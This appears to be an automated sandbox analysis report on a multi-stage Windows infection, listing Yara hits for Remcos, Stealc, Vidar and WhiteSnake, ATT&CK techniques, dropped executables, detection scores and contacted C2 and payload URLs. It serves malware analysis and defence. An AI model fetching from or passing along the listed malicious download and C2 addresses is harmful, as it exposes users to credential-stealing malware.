Source: Yara match	File source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2934103657.0000000004C2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: remcos_a.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: remcos.exe PID: 180, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Remcos\logs.dat, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.ed55d3f620.exe.5ef0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.c2a8de8bf3.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.ed55d3f620.exe.5ca0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.c2a8de8bf3.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1988015001.0000000000771000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1669066105.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2629001763.00000000003F1000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2791492042.00000000003F1000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.2738544511.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2902465184.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2630997068.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2908134178.0000000005EF1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2855529774.0000000005CA1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2576226521.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1989629326.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2858928335.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2794443992.00000000081E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 1780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c2a8de8bf3.exe PID: 3904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c2a8de8bf3.exe PID: 6228, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 6816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ed55d3f620.exe PID: 5744, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match

File source: Process Memory Space: buildd.exe PID: 8080, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C720C40 sqlite3_bind_zeroblob,	0_2_6C720C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C720D60 sqlite3_bind_parameter_name,	0_2_6C720D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C648EA0 sqlite3_clear_bindings,	0_2_6C648EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C720B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C720B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C646410 bind,WSAGetLastError,	0_2_6C646410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C646070 PR_Listen,	0_2_6C646070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C64C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C030 sqlite3_bind_parameter_count,	0_2_6C64C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6460B0 listen,WSAGetLastError,	0_2_6C6460B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D22D0 sqlite3_bind_blob,	0_2_6C5D22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6463C0 PR_Bind,	0_2_6C6463C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C649400 sqlite3_bind_int64,	0_2_6C649400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6494F0 sqlite3_bind_text16,	0_2_6C6494F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6494C0 sqlite3_bind_text,	0_2_6C6494C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C649480 sqlite3_bind_null,	0_2_6C649480
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B4EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	11_2_00B4EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00B4DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	11_2_00B4DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	51 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	2 Bypass User Account Control	4 Obfuscated Files or Information	1 Credentials in Registry	23 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	12 Process Injection	12 Software Packing	NTDS	259 System Information Discovery	Distributed Component Object Model	11 Input Capture	2 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	1091 Security Software Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	215 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Bypass User Account Control	DCSync	481 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	481 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	47%	ReversingLabs	Win32.Trojan.Generic
file.exe	46%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\buildd[1].exe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	100%	Avira	HEUR/AGEN.1314794
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\ProgramData\Remcos\remcos.exe	100%	Avira	HEUR/AGEN.1314794
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\remcos_a[1].exe	100%	Avira	HEUR/AGEN.1314794
C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\DocumentsFHIEBKKFHI.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\buildd[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\Remcos\remcos.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\remcos_a[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	100%	Joe Sandbox ML
C:\Users\user\DocumentsFHIEBKKFHI.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	100%	Joe Sandbox ML
C:\ProgramData\Remcos\remcos.exe	34%	ReversingLabs	Win32.Malware.Remcos
C:\ProgramData\chrome.dll	4%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\remcos_a[1].exe	34%	ReversingLabs	Win32.Malware.Remcos
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\buildd[1].exe	55%	ReversingLabs	Win32.Trojan.Mardom
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	34%	ReversingLabs	Win32.Malware.Remcos
C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	55%	ReversingLabs	Win32.Trojan.Mardom
C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	45%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\DocumentsFHIEBKKFHI.exe	45%	ReversingLabs	Win32.Infostealer.Tinba

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
dpdnow.duckdns.org	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://185.215.113.206)	0%	Avira URL Cloud	safe
http://185.215.113.206/746f34465cf17784/freebl3.dllu	100%	Avira URL Cloud	malware
https://founpiuer.store/apieed	100%	Avira URL Cloud	malware
http://185.215.113.206/6c4adf523b719729.phpThe	100%	Avira URL Cloud	malware
http://167.235.70.96:8080	0%	Avira URL Cloud	safe
http://185.215.113.206/746f34465cf17784/freebl3.dllo	100%	Avira URL Cloud	malware
https://founpiuer.store/apib	100%	Avira URL Cloud	malware
https://founpiuer.store/apiF	100%	Avira URL Cloud	malware
http://147.124.221.201:80802E	0%	Avira URL Cloud	safe
http://185.215.113.206/746f34465cf17784/freebl3.dllu	19%	Virustotal		Browse
https://founpiuer.store/apieed	3%	Virustotal		Browse
http://185.215.113.206/6c4adf523b719729.php/m	100%	Avira URL Cloud	malware
http://185.215.113.206/6c4adf523b719729.php/n	100%	Avira URL Cloud	malware
http://185.215.113.206J	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exeM	100%	Avira URL Cloud	phishing
http://185.215.113.16/luma/random.exe9	100%	Avira URL Cloud	phishing
https://founpiuer.store:443/api4	100%	Avira URL Cloud	malware
http://185.215.113.206/6c4adf523b719729.phpa-7368302a1ad4	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.php/h	100%	Avira URL Cloud	malware
http://185.215.113.206/6c4adf523b719729.phpty	100%	Avira URL Cloud	malware
http://209.38.221.184:8080	0%	Avira URL Cloud	safe
https://founpiuer.store/apider	100%	Avira URL Cloud	malware
http://185.215.113.16/mine/random.exeb	100%	Avira URL Cloud	phishing
http://185.215.113.16/mine/random.exei	100%	Avira URL Cloud	phishing
http://51.159.4.50:8080	0%	Avira URL Cloud	safe
http://185.215.113.206/6c4adf523b719729.phptf	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exes	100%	Avira URL Cloud	phishing
http://147.124.221.201:8080/sendData	0%	Avira URL Cloud	safe
http://185.215.113.206/746f34465cf17784/msvcp140.dll9	100%	Avira URL Cloud	malware
http://185.215.113.206/RRC:	100%	Avira URL Cloud	malware
http://8.216.92.21:8080	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpncodedP	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpncodedz	100%	Avira URL Cloud	malware
https://founpiuer.store/vo	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpesf	100%	Avira URL Cloud	malware
http://132.145.17.167:9090	0%	Avira URL Cloud	safe
http://31.41.244.11/files/remcos_a.exe	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
founpiuer.store	104.21.5.155	true	false		high
plus.l.google.com	216.58.206.46	true	false		high
play.google.com	142.250.186.78	true	false		high
www.google.com	172.217.16.196	true	false		high
ip-api.com	208.95.112.1	true	false		high
dpdnow.duckdns.org	194.59.31.120	true	true	3%, Virustotal, Browse	unknown
presticitpo.store	unknown	unknown	false		high
thumbystriw.store	unknown	unknown	false		high
necklacedmny.store	unknown	unknown	false		high
apis.google.com	unknown	unknown	false		high
crisiwarny.store	unknown	unknown	false		high
fadehairucw.store	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/	false	high
fadehairucw.store	false	high
http://185.215.113.206/6c4adf523b719729.php	false	high
http://ip-api.com/line?fields=query,country	false	high
http://185.215.113.206/746f34465cf17784/softokn3.dll	false	high
founpiuer.store	false	high
http://185.215.113.206/746f34465cf17784/freebl3.dll	false	high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0	false	high
http://185.215.113.206/746f34465cf17784/mozglue.dll	false	high
http://185.215.113.206/746f34465cf17784/nss3.dll	false	high
presticitpo.store	false	high
http://185.215.113.16/steam/random.exe	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high
navygenerayk.store	false	high
http://185.215.113.206/746f34465cf17784/sqlite3.dll	false	high
necklacedmny.store	false	high
http://185.215.113.206/746f34465cf17784/msvcp140.dll	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	ed55d3f620.exe, 0000001A.00000003.2534263654.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669405621.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	false		high
https://founpiuer.store/apii	ed55d3f620.exe, 0000001A.00000003.2534323513.0000000000791000.00000004.00000020.00020000.00000000.sdmp	false		high
https://founpiuer.store/apieed	ed55d3f620.exe, 0000001E.00000003.2700117064.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	false		high
https://138.2.92.67:443	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/746f34465cf17784/freebl3.dllu	file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.cloudflare.com/learning/acces	ed55d3f620.exe, 0000001A.00000003.2534323513.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://167.235.70.96:8080	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://20.78.55.47:8080	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/6c4adf523b719729.phpThe	ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206)	ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2611348298.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.161.20.142:8080	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
https://5.196.181.135:443	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/ws	c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpnu	skotes.exe, 0000000B.00000002.2929148209.00000000015B9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/746f34465cf17784/freebl3.dllo	file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://founpiuer.store/apib	ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://founpiuer.store/apiF	ed55d3f620.exe, 0000001A.00000003.2726803106.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.124.221.201:80802E	buildd.exe, 0000000E.00000002.2501434098.000001DBA8910000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206/6c4adf523b719729.php/m	c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/6c4adf523b719729.php/n	ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206J	c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exeM	skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://129.151.109.160:8080	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/luma/random.exe9	skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://founpiuer.store:443/api4	ed55d3f620.exe, 0000001A.00000003.2551431732.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/6c4adf523b719729.phpa-7368302a1ad4	c2a8de8bf3.exe, 0000001C.00000002.2630997068.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php/h	skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://209.38.221.184:8080	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/6c4adf523b719729.phpty	ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://159.203.174.113:8090	buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	false		high
